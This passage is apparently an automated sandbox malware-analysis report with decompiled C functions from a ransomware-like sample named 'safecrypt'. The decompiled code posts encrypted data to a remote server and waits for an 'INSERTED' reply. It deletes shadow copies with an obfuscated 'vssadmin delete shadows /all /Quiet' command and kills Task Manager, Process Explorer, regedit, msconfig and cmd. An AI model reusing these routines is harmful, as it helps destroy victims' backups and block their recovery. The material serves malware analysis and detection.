                    					_t196 =  *0x43fe18; // 0x0
                    					_t206 = _t203 + 0x60;
                    					_a329 = 0;
                    					_a333 = 0;
                    					_a337 = 0;
                    					_a341 = 0;
                    					_a345 = 0;
                    					_a349 = 0;
                    					_a353 = 0;
                    					_a357 = 0;
                    					_a359 = 0;
                    					_t102 = _t196;
                    					_a328 = _t137;
                    					_t33 = _t102 + 1; // 0x1
                    					_t190 = _t33;
                    					do {
                    						_t147 =  *_t102;
                    						_t102 = _t102 + 1;
                    					} while (_t147 != _t137);
                    					E00420970(_t137, _t196,  &_a328, _t102 - _t190);
                    					_push( &_a48);
                    					_push( &_a328);
                    					_a296 = 0xaaaaffff;
                    					_a300 = 0xefbe0000;
                    					_a304 = 0xadde;
                    					_a308 = 0xffffffbe;
                    					E00424020();
                    					_t107 =  &_a1128;
                    					_t208 = _t206 + 0xc;
                    					_t197 = _t107 + 1;
                    					do {
                    						_t150 =  *_t107;
                    						_t107 = _t107 + 1;
                    						_t223 = _t150 - _t137;
                    					} while (_t150 != _t137);
                    					_t151 = _t107 - _t197;
                    					E0042C770(_t208 + _t107 - _t197 + 0x4a1, 0x10, 0x10);
                    					_push( &_a48);
                    					_push( &_a296);
                    					_push( &_a1128);
                    					E0041BF80(_t107 - _t197 + 0x10 - (_t151 + 0x00000001 & 0x0000000f) + 1,  &_a8320);
                    					E0041BC10(0x1000,  &_a1128, "data=%s", E0041B640( &_a8320, _t107 - _t197 + 0x10 - (_t151 + 0x00000001 & 0x0000000f) + 1, _t223,  &_a8320));
                    					E004258B8(_t115);
                    					_t199 = E0041BC30( &_a360, _v32);
                    					_v20 = 0x124f80;
                    					InternetSetOptionA(_t199, 6,  &_v20, 4);
                    					GetLastError();
                    					_t192 = E0041BD40( &_a600, _t199);
                    					_a5208 = _t137;
                    					E0042C770( &_a5209, _t137, 0xc17);
                    					_t124 =  &_a1112;
                    					_t203 = _t208 + 0x40;
                    					_v44 = _t137;
                    					_t158 = _t124 + 1;
                    					do {
                    						_t182 =  *_t124;
                    						_t124 = _t124 + 1;
                    					} while (_t182 != _t137);
                    					_t125 = _t124 - _t158;
                    					_t159 = "Content-Type: application/x-www-form-urlencoded";
                    					_v32 = _t159 + 1;
                    					do {
                    						_t184 =  *_t159;
                    						_t159 = _t159 + 1;
                    					} while (_t184 != _t137);
                    					HttpSendRequestA(_t192, "Content-Type: application/x-www-form-urlencoded", _t159 - _v32,  &_a1112, _t125);
                    					if(GetLastError() != 0) {
                    						L19:
                    						InternetCloseHandle(_t192);
                    						InternetCloseHandle(_t199);
                    						_t188 = _v68;
                    						goto L20;
                    					}
                    					E0041BE60( &_a5188,  &_v64, _t192);
                    					_t132 = _v64;
                    					_t216 = _t203 + 4;
                    					 *(_t216 + _t132 + 0x149c) = _t137;
                    					 *(_t216 + _t132 + 0x14a1) = _t137;
                    					_t133 = strstr( &_a5188, "INSERTED");
                    					_t203 = _t216 + 8;
                    					if(_t133 != 0) {
                    						break;
                    					}
                    					goto L19;
                    					L20:
                    					_t189 =  &(_t188[1]);
                    					_a8 = _t189;
                    				} while (_t189 < 0x4804a8);
                    				InternetCloseHandle(_v0);
                    				if( *0x460a7c == _t137) {
                    					E004258B8(_v8);
                    				}
                    				ExitThread(1);
                    			}












































                    0x0041b7e0
                    0x0041b7ed
                    0x0041b803
                    0x0041b80b
                    0x0041b80f
                    0x0041b813
                    0x0041b81a
                    0x0041b830
                    0x0041b837
                    0x0041b83c
                    0x0041b83e
                    0x0041b840
                    0x0041b843
                    0x0041b843
                    0x0041b846
                    0x0041b846
                    0x0041b848
                    0x0041b849
                    0x0041b85f
                    0x00000000
                    0x00000000
                    0x0041b865
                    0x0041b86b
                    0x0041b880
                    0x0041b885
                    0x0041b885
                    0x0041b888
                    0x0041b88e
                    0x0041b8a3
                    0x0041b8a8
                    0x0041b8a8
                    0x0041b8b9
                    0x0041b8d6
                    0x0041b8de
                    0x0041b8e6
                    0x0041b8ee
                    0x0041b8f6
                    0x0041b8fe
                    0x0041b904
                    0x0041b905
                    0x0041b90b
                    0x0041b90c
                    0x0041b912
                    0x0041b913
                    0x0041b918
                    0x0041b919
                    0x0041b91e
                    0x0041b91f
                    0x0041b924
                    0x0041b925
                    0x0041b926
                    0x0041b92b
                    0x0041b92c
                    0x0041b931
                    0x0041b932
                    0x0041b933
                    0x0041b93c
                    0x0041b93d
                    0x0041b93e
                    0x0041b943
                    0x0041b948
                    0x0041b95f
                    0x0041b972
                    0x0041b979
                    0x0041b97e
                    0x0041b984
                    0x0041b989
                    0x0041b990
                    0x0041b997
                    0x0041b99e
                    0x0041b9a5
                    0x0041b9ac
                    0x0041b9b3
                    0x0041b9ba
                    0x0041b9c2
                    0x0041b9c9
                    0x0041b9cb
                    0x0041b9d2
                    0x0041b9d2
                    0x0041b9d5
                    0x0041b9d5
                    0x0041b9d7
                    0x0041b9d8
                    0x0041b9e8
                    0x0041b9f4
                    0x0041b9fc
                    0x0041b9fd
                    0x0041ba08
                    0x0041ba13
                    0x0041ba1e
                    0x0041ba29
                    0x0041ba2e
                    0x0041ba35
                    0x0041ba38
                    0x0041ba40
                    0x0041ba40
                    0x0041ba42
                    0x0041ba43
                    0x0041ba43
                    0x0041ba49
                    0x0041ba66
                    0x0041ba72
                    0x0041ba7a
                    0x0041ba82
                    0x0041ba8c
                    0x0041bab9
                    0x0041bac2
                    0x0041bae5
                    0x0041baea
                    0x0041baf2
                    0x0041baf8
                    0x0041bb1c
                    0x0041bb1e
                    0x0041bb25
                    0x0041bb2a
                    0x0041bb31
                    0x0041bb34
                    0x0041bb38
                    0x0041bb40
                    0x0041bb40
                    0x0041bb42
                    0x0041bb43
                    0x0041bb47
                    0x0041bb49
                    0x0041bb51
                    0x0041bb55
                    0x0041bb55
                    0x0041bb57
                    0x0041bb58
                    0x0041bb70
                    0x0041bb7e
                    0x0041bbc0
                    0x0041bbc7
                    0x0041bbca
                    0x0041bbcc
                    0x00000000
                    0x0041bbcc
                    0x0041bb8c
                    0x0041bb91
                    0x0041bb95
                    0x0041bba4
                    0x0041bbac
                    0x0041bbb3
                    0x0041bbb9
                    0x0041bbbe
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041bbd0
                    0x0041bbd0
                    0x0041bbd3
                    0x0041bbd7
                    0x0041bbe8
                    0x0041bbf4
                    0x0041bbfb
                    0x0041bc00
                    0x0041bc05

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$Internet_alldiv$CrackErrorLastOption_free
                    • String ID: 3.0.0a$<$Content-Type: application/x-www-form-urlencoded$INSERTED$data=%s
                    • API String ID: 1765502259-451914084
                    • Opcode ID: 3ce4e78c82ec1a8f859e741f0438997534b0066702c3e76c079070e1e6b039d9
                    • Instruction ID: bd58787350d36e5a51a4b6c484f588a63d6705a3267ebb551dd0528eaa9203d9
                    • Opcode Fuzzy Hash: 3ce4e78c82ec1a8f859e741f0438997534b0066702c3e76c079070e1e6b039d9
                    • Instruction Fuzzy Hash: 9BB1A5B1508384AFD320DB64EC55EEB77E9AFC9304F44492DF189C7252E7749508CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0041ED00(void* __ebx) {
                    				signed int _v8;
                    				char _v263;
                    				char _v264;
                    				char _v524;
                    				char _v528;
                    				void* _v532;
                    				intOrPtr _v560;
                    				char* _v568;
                    				char* _v572;
                    				char* _v576;
                    				intOrPtr _v584;
                    				char _v588;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t29;
                    				intOrPtr* _t33;
                    				void* _t47;
                    				intOrPtr* _t50;
                    				void* _t55;
                    				void* _t57;
                    				void* _t70;
                    				void* _t72;
                    				signed int _t74;
                    				void* _t75;
                    				void* _t76;
                    				void* _t78;
                    				void* _t79;
                    
                    				_t57 = __ebx;
                    				_t29 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t29 ^ _t74;
                    				_v264 = 0;
                    				E0042C770( &_v263, 0, 0xff);
                    				_t33 =  *0x480454;
                    				_t76 = _t75 + 0xc;
                    				_v528 = 0;
                    				if(_t33 != 0) {
                    					 *_t33( &_v528);
                    				}
                    				E00425D1D( &_v264, 0x100, "vssa");
                    				E00425D1D( &_v264, 0x100, "dmin");
                    				E00425D1D( &_v264, 0x100, ".exe");
                    				E0042C770( &_v524, 0, 0x104);
                    				E00425D1D( &_v524, 0x104, " delete ");
                    				E00425D1D( &_v524, 0x104, " shadows ");
                    				E00425D1D( &_v524, 0x104, " /all  ");
                    				E00425D1D( &_v524, 0x104, " /Quiet  ");
                    				E0042C770( &_v588, 0, 0x3c);
                    				_t78 = _t76 + 0x6c;
                    				_v588 = 0x3c;
                    				_v576 = "open";
                    				if( *0x480450 == 0) {
                    					_v576 = "runas";
                    				}
                    				_t69 =  &_v264;
                    				_v572 =  &_v264;
                    				_v568 =  &_v524;
                    				_v560 = 0;
                    				_v584 = 0x40;
                    				_t47 = E00420630( &_v588);
                    				_t79 = _t78 + 4;
                    				if(_t47 == 0) {
                    					_push(_t72);
                    					_push(_t70);
                    					while(GetLastError() == 0x4c7) {
                    						Sleep(0x834);
                    						_t69 =  &_v588;
                    						_t55 = E00420630( &_v588);
                    						_t79 = _t79 + 4;
                    						if(_t55 == 0) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_pop(_t70);
                    					_pop(_t72);
                    				}
                    				CloseHandle(_v532);
                    				_t50 =  *0x480458;
                    				if(_t50 != 0) {
                    					 *_t50(_v528);
                    				}
                    				return E004256D3(0, _t57, _v8 ^ _t74, _t69, _t70, _t72);
                    			}






























                    0x0041ed00
                    0x0041ed09
                    0x0041ed10
                    0x0041ed21
                    0x0041ed28
                    0x0041ed2d
                    0x0041ed32
                    0x0041ed35
                    0x0041ed41
                    0x0041ed4a
                    0x0041ed4a
                    0x0041ed5d
                    0x0041ed73
                    0x0041ed89
                    0x0041ed9c
                    0x0041edb2
                    0x0041edc8
                    0x0041ede1
                    0x0041edf7
                    0x0041ee07
                    0x0041ee0c
                    0x0041ee16
                    0x0041ee20
                    0x0041ee2a
                    0x0041ee2c
                    0x0041ee2c
                    0x0041ee3c
                    0x0041ee49
                    0x0041ee4f
                    0x0041ee55
                    0x0041ee5f
                    0x0041ee69
                    0x0041ee6e
                    0x0041ee73
                    0x0041ee75
                    0x0041ee7c
                    0x0041ee83
                    0x0041ee91
                    0x0041ee93
                    0x0041ee9a
                    0x0041ee9f
                    0x0041eea4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041eea4
                    0x0041eea6
                    0x0041eea7
                    0x0041eea7
                    0x0041eeaf
                    0x0041eeb5
                    0x0041eebc
                    0x0041eec5
                    0x0041eec5
                    0x0041eed6

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strcat_s$_memset$CloseErrorHandleLastSleep
                    • String ID: /Quiet $ /all $ delete $ shadows $.exe$<$@$dmin$open$runas$vssa
                    • API String ID: 3950837021-3701683252
                    • Opcode ID: f3d05da93a31d974641001dee173b8e14cc5aed78445a24418f45c8dafe39de4
                    • Instruction ID: 9c3bf10371f8ed48a855842f2e6262baec1f397de9824df0ef56c7eaf2917f82
                    • Opcode Fuzzy Hash: f3d05da93a31d974641001dee173b8e14cc5aed78445a24418f45c8dafe39de4
                    • Instruction Fuzzy Hash: 4F41EAF5A5031857D720EB61DC89FDE73B89F48704F5045DAB208A7191EBB8AAC4CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 62%
                    			E0042AA4E(void* __ebx) {
                    				void* __edi;
                    				void* __esi;
                    				_Unknown_base(*)()* _t7;
                    				long _t10;
                    				void* _t11;
                    				int _t12;
                    				void* _t14;
                    				void* _t15;
                    				void* _t16;
                    				void* _t18;
                    				intOrPtr _t21;
                    				long _t26;
                    				void* _t30;
                    				struct HINSTANCE__* _t35;
                    				intOrPtr* _t36;
                    				void* _t39;
                    				intOrPtr* _t41;
                    				void* _t42;
                    
                    				_t30 = __ebx;
                    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                    				if(_t35 != 0) {
                    					 *0x43f130 = GetProcAddress(_t35, "FlsAlloc");
                    					 *0x43f134 = GetProcAddress(_t35, "FlsGetValue");
                    					 *0x43f138 = GetProcAddress(_t35, "FlsSetValue");
                    					_t7 = GetProcAddress(_t35, "FlsFree");
                    					__eflags =  *0x43f130;
                    					_t39 = TlsSetValue;
                    					 *0x43f13c = _t7;
                    					if( *0x43f130 == 0) {
                    						L6:
                    						 *0x43f134 = TlsGetValue;
                    						 *0x43f130 = E0042A75E;
                    						 *0x43f138 = _t39;
                    						 *0x43f13c = TlsFree;
                    					} else {
                    						__eflags =  *0x43f134;
                    						if( *0x43f134 == 0) {
                    							goto L6;
                    						} else {
                    							__eflags =  *0x43f138;
                    							if( *0x43f138 == 0) {
                    								goto L6;
                    							} else {
                    								__eflags = _t7;
                    								if(_t7 == 0) {
                    									goto L6;
                    								}
                    							}
                    						}
                    					}
                    					_t10 = TlsAlloc();
                    					 *0x43db90 = _t10;
                    					__eflags = _t10 - 0xffffffff;
                    					if(_t10 == 0xffffffff) {
                    						L15:
                    						_t11 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t12 = TlsSetValue(_t10,  *0x43f134);
                    						__eflags = _t12;
                    						if(_t12 == 0) {
                    							goto L15;
                    						} else {
                    							E00428614();
                    							_t41 = __imp__EncodePointer;
                    							_t14 =  *_t41( *0x43f130);
                    							 *0x43f130 = _t14;
                    							_t15 =  *_t41( *0x43f134);
                    							 *0x43f134 = _t15;
                    							_t16 =  *_t41( *0x43f138);
                    							 *0x43f138 = _t16;
                    							 *0x43f13c =  *_t41( *0x43f13c);
                    							_t18 = E0042CBD5();
                    							__eflags = _t18;
                    							if(_t18 == 0) {
                    								L14:
                    								E0042A79B();
                    								goto L15;
                    							} else {
                    								_t36 = __imp__DecodePointer;
                    								_t21 =  *((intOrPtr*)( *_t36()))( *0x43f130, E0042A91F);
                    								 *0x43db8c = _t21;
                    								__eflags = _t21 - 0xffffffff;
                    								if(_t21 == 0xffffffff) {
                    									goto L14;
                    								} else {
                    									_t42 = E0042C852(1, 0x214);
                    									__eflags = _t42;
                    									if(_t42 == 0) {
                    										goto L14;
                    									} else {
                    										__eflags =  *((intOrPtr*)( *_t36()))( *0x43f138,  *0x43db8c, _t42);
                    										if(__eflags == 0) {
                    											goto L14;
                    										} else {
                    											_push(0);
                    											_push(_t42);
                    											E0042A7D8(_t30, _t36, _t42, __eflags);
                    											_t26 = GetCurrentThreadId();
                    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                    											 *_t42 = _t26;
                    											_t11 = 1;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					return _t11;
                    				} else {
                    					E0042A79B();
                    					return 0;
                    				}
                    			}





















                    0x0042aa4e
                    0x0042aa5c
                    0x0042aa60
                    0x0042aa80
                    0x0042aa8d
                    0x0042aa9a
                    0x0042aa9f
                    0x0042aaa1
                    0x0042aaa8
                    0x0042aaae
                    0x0042aab3
                    0x0042aacb
                    0x0042aad0
                    0x0042aada
                    0x0042aae4
                    0x0042aaea
                    0x0042aab5
                    0x0042aab5
                    0x0042aabc
                    0x00000000
                    0x0042aabe
                    0x0042aabe
                    0x0042aac5
                    0x00000000
                    0x0042aac7
                    0x0042aac7
                    0x0042aac9
                    0x00000000
                    0x00000000
                    0x0042aac9
                    0x0042aac5
                    0x0042aabc
                    0x0042aaef
                    0x0042aaf5
                    0x0042aafa
                    0x0042aafd
                    0x0042abc4
                    0x0042abc4
                    0x0042abc4
                    0x0042ab03
                    0x0042ab0a
                    0x0042ab0c
                    0x0042ab0e
                    0x00000000
                    0x0042ab14
                    0x0042ab14
                    0x0042ab1f
                    0x0042ab25
                    0x0042ab2d
                    0x0042ab32
                    0x0042ab3a
                    0x0042ab3f
                    0x0042ab47
                    0x0042ab4e
                    0x0042ab53
                    0x0042ab58
                    0x0042ab5a
                    0x0042abbf
                    0x0042abbf
                    0x00000000
                    0x0042ab5c
                    0x0042ab5c
                    0x0042ab6f
                    0x0042ab71
                    0x0042ab76
                    0x0042ab79
                    0x00000000
                    0x0042ab7b
                    0x0042ab87
                    0x0042ab8b
                    0x0042ab8d
                    0x00000000
                    0x0042ab8f
                    0x0042aba0
                    0x0042aba2
                    0x00000000
                    0x0042aba4
                    0x0042aba4
                    0x0042aba6
                    0x0042aba7
                    0x0042abae
                    0x0042abb4
                    0x0042abb8
                    0x0042abbc
                    0x0042abbc
                    0x0042aba2
                    0x0042ab8d
                    0x0042ab79
                    0x0042ab5a
                    0x0042ab0e
                    0x0042abc8
                    0x0042aa62
                    0x0042aa62
                    0x0042aa6a
                    0x0042aa6a

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00426802), ref: 0042AA56
                    • __mtterm.LIBCMT ref: 0042AA62
                      • Part of subcall function 0042A79B: DecodePointer.KERNEL32(00000005,0042ABC4,?,00426802), ref: 0042A7AC
                      • Part of subcall function 0042A79B: TlsFree.KERNEL32(0000001A,0042ABC4,?,00426802), ref: 0042A7C6
                      • Part of subcall function 0042A79B: DeleteCriticalSection.KERNEL32(00000000,00000000,77E4F3A0,?,0042ABC4,?,00426802), ref: 0042CC3C
                      • Part of subcall function 0042A79B: _free.LIBCMT ref: 0042CC3F
                      • Part of subcall function 0042A79B: DeleteCriticalSection.KERNEL32(0000001A,77E4F3A0,?,0042ABC4,?,00426802), ref: 0042CC66
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042AA78
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042AA85
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042AA92
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042AA9F
                    • TlsAlloc.KERNEL32(?,00426802), ref: 0042AAEF
                    • TlsSetValue.KERNEL32(00000000,?,00426802), ref: 0042AB0A
                    • __init_pointers.LIBCMT ref: 0042AB14
                    • EncodePointer.KERNEL32(?,00426802), ref: 0042AB25
                    • EncodePointer.KERNEL32(?,00426802), ref: 0042AB32
                    • EncodePointer.KERNEL32(?,00426802), ref: 0042AB3F
                    • EncodePointer.KERNEL32(?,00426802), ref: 0042AB4C
                    • DecodePointer.KERNEL32(0042A91F,?,00426802), ref: 0042AB6D
                    • __calloc_crt.LIBCMT ref: 0042AB82
                    • DecodePointer.KERNEL32(00000000,?,00426802), ref: 0042AB9C
                    • GetCurrentThreadId.KERNEL32 ref: 0042ABAE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: 6402222f931019e0a263305b7d64955ff0529ccb091b6faf6840f6ff57d3bf8d
                    • Instruction ID: 63451e9ee2372d0d2f6e36bcbba75019223a06b5d1391e550d8909eb6168422a
                    • Opcode Fuzzy Hash: 6402222f931019e0a263305b7d64955ff0529ccb091b6faf6840f6ff57d3bf8d
                    • Instruction Fuzzy Hash: 25315B31E01220DBCF11AB75FE48A0E3EA1AB45324F54253BEA90C32B0DB789856DE5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E00420200(void* __ebx, void* __edi, void* __esi) {
                    				signed int _v8;
                    				char _v8198;
                    				long _v8200;
                    				char _v88200;
                    				unsigned int _v88204;
                    				long _v88208;
                    				unsigned int _v88212;
                    				signed int _t28;
                    				char* _t37;
                    				unsigned int _t39;
                    				intOrPtr* _t42;
                    				intOrPtr* _t44;
                    				intOrPtr* _t47;
                    				wchar_t* _t52;
                    				intOrPtr* _t53;
                    				wchar_t* _t55;
                    				wchar_t* _t57;
                    				wchar_t* _t58;
                    				wchar_t* _t59;
                    				signed int _t61;
                    				intOrPtr _t66;
                    				intOrPtr _t74;
                    				void* _t75;
                    				signed int _t76;
                    				void* _t77;
                    				void* _t78;
                    				void* _t80;
                    				void* _t81;
                    
                    				_t73 = __esi;
                    				_t71 = __edi;
                    				_t60 = __ebx;
                    				E0042DFB0(0x15894);
                    				_t28 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t28 ^ _t76;
                    				_v8200 = 0;
                    				E0042C770( &_v8198, 0, 0x1ffe);
                    				_t78 = _t77 + 0xc;
                    				_v88208 = GetCurrentProcessId();
                    				if( *0x46844c != 0) {
                    					_push(__ebx);
                    					_push(__esi);
                    					_push(__edi);
                    					do {
                    						_t69 =  &_v88212;
                    						_t37 =  &_v88200;
                    						__imp__EnumProcesses(_t37, 0x9c40,  &_v88212);
                    						if(_t37 != 0) {
                    							_t39 = _v88212 >> 2;
                    							_t61 = 0;
                    							_v88204 = _t39;
                    							if(_t39 != 0) {
                    								do {
                    									_t74 =  *((intOrPtr*)(_t76 + _t61 * 4 - 0x15884));
                    									if(_t74 != _v88208 && _t74 != 0) {
                    										_t42 = E00412FC0(_t69, 0, 1, 0x99a4299d);
                    										_t80 = _t78 + 0xc;
                    										_t75 =  *_t42(0x2000030, 0, _t74);
                    										if(_t75 == 0) {
                    											L17:
                    											_t44 = E00412FC0(_t69, 0, 1, 0x723eb0d5);
                    											_t78 = _t80 + 0xc;
                    											 *_t44(_t75);
                    										} else {
                    											E0042C770( &_v8200, 0, 0x2000);
                    											_t78 = _t80 + 0xc;
                    											__imp__GetProcessImageFileNameW(_t75,  &_v8200, 0x1000);
                    											_t47 =  &_v8200;
                    											_t69 = _t47 + 2;
                    											do {
                    												_t66 =  *_t47;
                    												_t47 = _t47 + 2;
                    											} while (_t66 != 0);
                    											if(_t47 != _t69) {
                    												E00426123( &_v8200, 0x1000);
                    												_t52 = wcsstr( &_v8200, L"askmg");
                    												_t81 = _t78 + 0x10;
                    												if(_t52 != 0) {
                    													L16:
                    													_t53 = E00412FC0(_t69, 0, 1, 0x9e6fa842);
                    													_t80 = _t81 + 0xc;
                    													 *_t53(_t75, 0);
                    												} else {
                    													_t69 =  &_v8200;
                    													_t55 = wcsstr( &_v8200, L"rocex");
                    													_t81 = _t81 + 8;
                    													if(_t55 != 0) {
                    														goto L16;
                    													} else {
                    														_t57 = wcsstr( &_v8200, L"egedi");
                    														_t81 = _t81 + 8;
                    														if(_t57 != 0) {
                    															goto L16;
                    														} else {
                    															_t58 = wcsstr( &_v8200, L"sconfi");
                    															_t81 = _t81 + 8;
                    															if(_t58 != 0) {
                    																goto L16;
                    															} else {
                    																_t69 =  &_v8200;
                    																_t59 = wcsstr( &_v8200, L"cmd");
                    																_t80 = _t81 + 8;
                    																if(_t59 != 0) {
                    																	goto L16;
                    																}
                    															}
                    														}
                    													}
                    												}
                    												goto L17;
                    											}
                    										}
                    										_t39 = _v88204;
                    									}
                    									_t61 = _t61 + 1;
                    								} while (_t61 < _t39);
                    							}
                    							E0042C770( &_v88200, 0, 0x13880);
                    							_t78 = _t78 + 0xc;
                    							Sleep(0xc8);
                    						}
                    					} while ( *0x46844c != 0);
                    					_pop(_t71);
                    					_pop(_t73);
                    					_pop(_t60);
                    				}
                    				 *((intOrPtr*)(E00412FC0(_t69, 0, 1, 0x768aa260)))();
                    				return E004256D3(1, _t60, _v8 ^ _t76, _t69, _t71, _t73, 0xffffffff);
                    			}































                    0x00420200
                    0x00420200
                    0x00420200
                    0x00420208
                    0x0042020d
                    0x00420214
                    0x00420226
                    0x0042022d
                    0x00420232
                    0x00420242
                    0x00420248
                    0x0042024e
                    0x0042024f
                    0x00420250
                    0x00420260
                    0x00420260
                    0x0042026c
                    0x00420273
                    0x0042027b
                    0x00420287
                    0x0042028a
                    0x0042028c
                    0x00420294
                    0x004202a0
                    0x004202a0
                    0x004202ad
                    0x004202c4
                    0x004202c9
                    0x004202d6
                    0x004202da
                    0x004203b7
                    0x004203c0
                    0x004203c5
                    0x004203c9
                    0x004202e0
                    0x004202ee
                    0x004202f3
                    0x00420303
                    0x00420309
                    0x0042030f
                    0x00420312
                    0x00420312
                    0x00420315
                    0x00420318
                    0x00420321
                    0x00420333
                    0x00420344
                    0x00420346
                    0x0042034b
                    0x004203a1
                    0x004203aa
                    0x004203af
                    0x004203b5
                    0x0042034d
                    0x0042034d
                    0x00420359
                    0x0042035b
                    0x00420360
                    0x00000000
                    0x00420362
                    0x0042036e
                    0x00420370
                    0x00420375
                    0x00000000
                    0x00420377
                    0x00420383
                    0x00420385
                    0x0042038a
                    0x00000000
                    0x0042038c
                    0x0042038c
                    0x00420398
                    0x0042039a
                    0x0042039f
                    0x00000000
                    0x00000000
                    0x0042039f
                    0x0042038a
                    0x00420375
                    0x00420360
                    0x00000000
                    0x0042034b
                    0x00420321
                    0x004203cb
                    0x004203cb
                    0x004203d1
                    0x004203d2
                    0x004202a0
                    0x004203e8
                    0x004203ed
                    0x004203f5
                    0x004203f5
                    0x004203fb
                    0x00420408
                    0x00420409
                    0x0042040a
                    0x0042040a
                    0x0042041e
                    0x00420432

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: wcsstr$_memset$Process$CurrentEnumFileImageNameProcessesSleep
                    • String ID: askmg$cmd$egedi$rocex$sconfi
                    • API String ID: 2052185934-3583037101
                    • Opcode ID: ebe720161988235cf71c7f045c81fe5bb202f5c7562bae19e687f92eea85bc0b
                    • Instruction ID: b262025a8f7409b4f4b3e07e9675985a98886e9c244c715278cdc869f55fabf0
                    • Opcode Fuzzy Hash: ebe720161988235cf71c7f045c81fe5bb202f5c7562bae19e687f92eea85bc0b
                    • Instruction Fuzzy Hash: E251E131B40325ABDB24E755AD85FDB73A4DF44705F840056FA04FA182EBB49A44CE6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E004134E0(wchar_t* _a4) {
                    				signed int _v8;
                    				char _v8198;
                    				short _v8200;
                    				long _v8204;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t26;
                    				wchar_t* _t32;
                    				intOrPtr* _t40;
                    				intOrPtr* _t43;
                    				wchar_t* _t50;
                    				intOrPtr* _t52;
                    				intOrPtr* _t55;
                    				intOrPtr* _t56;
                    				long _t57;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				void* _t64;
                    				void* _t65;
                    				void* _t69;
                    				void* _t71;
                    				void* _t73;
                    				void* _t74;
                    				signed int _t75;
                    				void* _t76;
                    				void* _t77;
                    				void* _t78;
                    				void* _t79;
                    
                    				E0042DFB0(0x2008);
                    				_t26 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t26 ^ _t75;
                    				_t50 = _a4;
                    				_v8204 = 0;
                    				_v8200 = 0;
                    				E0042C770( &_v8198, 0, 0x1ffe);
                    				_t77 = _t76 + 0xc;
                    				_t52 = 0x474450;
                    				_t30 = _t50;
                    				while(1) {
                    					_t62 =  *_t30;
                    					if(_t62 !=  *_t52) {
                    						break;
                    					}
                    					if(_t62 == 0) {
                    						L5:
                    						_t30 = 0;
                    					} else {
                    						_t62 = _t30[0];
                    						if(_t62 !=  *((intOrPtr*)(_t52 + 2))) {
                    							break;
                    						} else {
                    							_t30 =  &(_t30[1]);
                    							_t52 = _t52 + 4;
                    							if(_t62 != 0) {
                    								continue;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					L7:
                    					if(_t30 != 0) {
                    						_t55 = 0x46e450;
                    						_t30 = _t50;
                    						while(1) {
                    							_t62 =  *_t30;
                    							if(_t62 !=  *_t55) {
                    								break;
                    							}
                    							if(_t62 == 0) {
                    								L13:
                    								_t30 = 0;
                    							} else {
                    								_t62 = _t30[0];
                    								if(_t62 !=  *((intOrPtr*)(_t55 + 2))) {
                    									break;
                    								} else {
                    									_t30 =  &(_t30[1]);
                    									_t55 = _t55 + 4;
                    									if(_t62 != 0) {
                    										continue;
                    									} else {
                    										goto L13;
                    									}
                    								}
                    							}
                    							L15:
                    							if(_t30 != 0) {
                    								_t56 = 0x47c450;
                    								_t30 = _t50;
                    								while(1) {
                    									_t62 =  *_t30;
                    									if(_t62 !=  *_t56) {
                    										break;
                    									}
                    									if(_t62 == 0) {
                    										L21:
                    										_t30 = 0;
                    									} else {
                    										_t62 = _t30[0];
                    										if(_t62 !=  *((intOrPtr*)(_t56 + 2))) {
                    											break;
                    										} else {
                    											_t30 =  &(_t30[1]);
                    											_t56 = _t56 + 4;
                    											if(_t62 != 0) {
                    												continue;
